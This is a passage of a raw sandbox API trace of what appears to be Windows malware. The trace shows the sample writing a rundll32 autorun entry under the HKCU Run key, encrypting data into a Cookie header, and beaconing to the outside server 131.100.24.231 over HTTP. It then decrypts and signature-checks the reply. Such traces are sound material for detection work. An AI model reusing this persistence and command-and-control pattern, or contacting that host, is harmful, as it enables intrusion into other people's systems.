(in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0247.175] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0247.175] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a76424, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0247.177] GetProcessHeap () returned 0x530000 [0247.177] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c750 [0247.177] GetProcessHeap () returned 0x530000 [0247.177] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0247.177] GetProcessHeap () returned 0x530000 [0247.178] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0247.178] GetProcessHeap () returned 0x530000 [0247.178] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5fafd0 | out: hHeap=0x530000) returned 1 [0247.178] GetProcessHeap () returned 0x530000 [0247.179] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0247.179] GetProcessHeap () returned 0x530000 [0247.179] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0247.179] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0247.179] GetProcessHeap () returned 0x530000 [0247.179] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83ae0 [0247.179] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",WvmpILtp") returned 98 [0247.179] GetProcessHeap () returned 0x530000 [0247.180] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83ae0 | out: hHeap=0x530000) returned 1 [0247.180] GetProcessHeap () returned 0x530000 [0247.180] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0247.180] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x670, lpdwDisposition=0x0) returned 0x0 [0247.180] GetProcessHeap () returned 0x530000 [0247.181] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0247.181] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",WvmpILtp") returned 98 [0247.181] RegSetValueExW (in: hKey=0x670, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",WvmpILtp", cbData=0xc6 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",WvmpILtp") returned 0x0 [0247.182] RegCloseKey (hKey=0x670) returned 0x0 [0247.182] GetProcessHeap () returned 0x530000 [0247.182] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c750 | out: hHeap=0x530000) returned 1 [0247.182] GetProcessHeap () returned 0x530000 [0247.183] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5afeb0 | out: hHeap=0x530000) returned 1 [0247.183] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xe2489) returned 0x102 [0257.187] GetProcessHeap () returned 0x530000 [0257.187] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7218 [0257.187] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0257.187] GetProcessHeap () returned 0x530000 [0257.187] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7218 | out: hHeap=0x530000) returned 1 [0257.187] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0257.187] GetProcessHeap () returned 0x530000 [0257.187] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7218 [0257.187] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0257.187] GetProcessHeap () returned 0x530000 [0257.187] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7218 | out: hHeap=0x530000) returned 1 [0257.187] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83ae0 [0257.189] FindNextFileW (in: hFindFile=0x2a83ae0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0257.189] FindNextFileW (in: hFindFile=0x2a83ae0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0257.189] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0257.189] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0257.189] FindNextFileW (in: hFindFile=0x2a83ae0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0257.189] FindClose (in: hFindFile=0x2a83ae0 | out: hFindFile=0x2a83ae0) returned 1 [0257.190] GetProcessHeap () returned 0x530000 [0257.190] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x5afeb0 [0257.190] GetProcessHeap () returned 0x530000 [0257.190] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7218 [0257.190] GetProcessHeap () returned 0x530000 [0257.190] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2ad1810 [0257.190] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0257.191] GetProcessHeap () returned 0x530000 [0257.191] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7218 | out: hHeap=0x530000) returned 1 [0257.191] GetProcessHeap () returned 0x530000 [0257.191] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ad1810 | out: hHeap=0x530000) returned 1 [0257.191] GetProcessHeap () returned 0x530000 [0257.191] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2aa3d00 [0257.191] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0257.191] GetProcessHeap () returned 0x530000 [0257.191] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aa3d00 | out: hHeap=0x530000) returned 1 [0257.191] GetProcessHeap () returned 0x530000 [0257.191] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0257.192] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0257.192] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x5afeb0, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0257.192] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0257.192] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0257.192] GetProcessHeap () returned 0x530000 [0257.192] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0257.192] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0257.192] GetProcessHeap () returned 0x530000 [0257.192] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x2a76420 [0257.192] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0257.192] GetProcessHeap () returned 0x530000 [0257.192] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0257.192] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76488, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76488, pcbResult=0x2cf4b4) returned 0x0 [0257.192] GetProcessHeap () returned 0x530000 [0257.192] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xda) returned 0x2aa0b28 [0257.192] GetProcessHeap () returned 0x530000 [0257.193] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0257.193] GetProcessHeap () returned 0x530000 [0257.193] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0257.193] CryptBinaryToStringW (in: pbBinary=0x2aa0b28, cbBinary=0xda, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0257.193] GetProcessHeap () returned 0x530000 [0257.193] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x24a) returned 0x2b65430 [0257.193] CryptBinaryToStringW (in: pbBinary=0x2aa0b28, cbBinary=0xda, dwFlags=0x40000001, pszString=0x2b65430, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTjW1uxYyaADqjX3VDLhIDzz0a1yiDAvvwQV+rRXEZvpXoSq8d5yXNL+/yhpZKTNNzEQtVrAbVlsdWKg=", pcchString=0x2cf504) returned 1 [0257.193] GetProcessHeap () returned 0x530000 [0257.193] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0257.193] GetProcessHeap () returned 0x530000 [0257.193] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2aa3d28 [0257.193] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: JKCCxFZzBtyEvOg=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTjW1uxYyaADqjX3VDLhIDzz0a1yiDAvvwQV+rRXEZvpXoSq8d5yXNL+/yhpZKTNNzEQtVrAbVlsdWKg=\r\n") returned 318 [0257.193] GetProcessHeap () returned 0x530000 [0257.194] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aa3d28 | out: hHeap=0x530000) returned 1 [0257.194] GetProcessHeap () returned 0x530000 [0257.194] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b65430 | out: hHeap=0x530000) returned 1 [0257.194] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0257.194] GetProcessHeap () returned 0x530000 [0257.194] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0257.194] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0257.196] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="ovZMsGwuDvkCTVAuyUErEnviJRjFoYdxqzHAHCmEFowVipOJxPzHxegcyB", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0257.196] GetProcessHeap () returned 0x530000 [0257.196] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0257.196] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0257.196] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0257.196] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0257.196] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: JKCCxFZzBtyEvOg=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTjW1uxYyaADqjX3VDLhIDzz0a1yiDAvvwQV+rRXEZvpXoSq8d5yXNL+/yhpZKTNNzEQtVrAbVlsdWKg=\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0258.355] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0258.355] GetProcessHeap () returned 0x530000 [0258.356] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0258.356] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x45f) returned 1 [0258.356] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b4825f, dwNumberOfBytesToRead=0xfba1, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b4825f*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0258.356] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0258.356] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0258.356] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0258.356] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0258.356] GetProcessHeap () returned 0x530000 [0258.356] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0258.356] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf51c) returned 0x0 [0258.356] GetProcessHeap () returned 0x530000 [0258.357] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd70e0 [0258.357] GetProcessHeap () returned 0x530000 [0258.357] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2ad1810 [0258.357] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0258.357] GetProcessHeap () returned 0x530000 [0258.357] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd70e0 | out: hHeap=0x530000) returned 1 [0258.358] GetProcessHeap () returned 0x530000 [0258.358] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ad1810 | out: hHeap=0x530000) returned 1 [0258.358] GetProcessHeap () returned 0x530000 [0258.358] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2aa3df0 [0258.358] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0258.358] GetProcessHeap () returned 0x530000 [0258.358] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aa3df0 | out: hHeap=0x530000) returned 1 [0258.358] GetProcessHeap () returned 0x530000 [0258.358] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0258.358] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0258.358] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2a76468, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0258.358] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0258.358] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0258.359] GetProcessHeap () returned 0x530000 [0258.359] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0258.359] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0258.359] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a76424, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0258.361] GetProcessHeap () returned 0x530000 [0258.361] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c650 [0258.361] GetProcessHeap () returned 0x530000 [0258.362] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0258.362] GetProcessHeap () returned 0x530000 [0258.362] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0258.363] GetProcessHeap () returned 0x530000 [0258.363] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aa0b28 | out: hHeap=0x530000) returned 1 [0258.363] GetProcessHeap () returned 0x530000 [0258.363] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0258.363] GetProcessHeap () returned 0x530000 [0258.363] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0258.363] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0258.363] GetProcessHeap () returned 0x530000 [0258.363] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83960 [0258.364] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",agYgigWVpOAVBG") returned 104 [0258.364] GetProcessHeap () returned 0x530000 [0258.364] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83960 | out: hHeap=0x530000) returned 1 [0258.364] GetProcessHeap () returned 0x530000 [0258.364] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0258.364] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x670, lpdwDisposition=0x0) returned 0x0 [0258.364] GetProcessHeap () returned 0x530000 [0258.365] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0258.365] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",agYgigWVpOAVBG") returned 104 [0258.365] RegSetValueExW (in: hKey=0x670, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",agYgigWVpOAVBG", cbData=0xd2 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",agYgigWVpOAVBG") returned 0x0 [0258.365] RegCloseKey (hKey=0x670) returned 0x0 [0258.366] GetProcessHeap () returned 0x530000 [0258.366] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c650 | out: hHeap=0x530000) returned 1 [0258.366] GetProcessHeap () returned 0x530000 [0258.366] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5afeb0 | out: hHeap=0x530000) returned 1 [0258.366] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xe269a) returned 0x102 [0268.387] GetProcessHeap () returned 0x530000 [0268.387] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd70e0 [0268.387] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0268.387] GetProcessHeap () returned 0x530000 [0268.387] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd70e0 | out: hHeap=0x530000) returned 1 [0268.387] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0268.387] GetProcessHeap () returned 0x530000 [0268.387] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd70e0 [0268.388] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0268.388] GetProcessHeap () returned 0x530000 [0268.388] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd70e0 | out: hHeap=0x530000) returned 1 [0268.388] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83960 [0268.390] FindNextFileW (in: hFindFile=0x2a83960, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0268.391] FindNextFileW (in: hFindFile=0x2a83960, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) 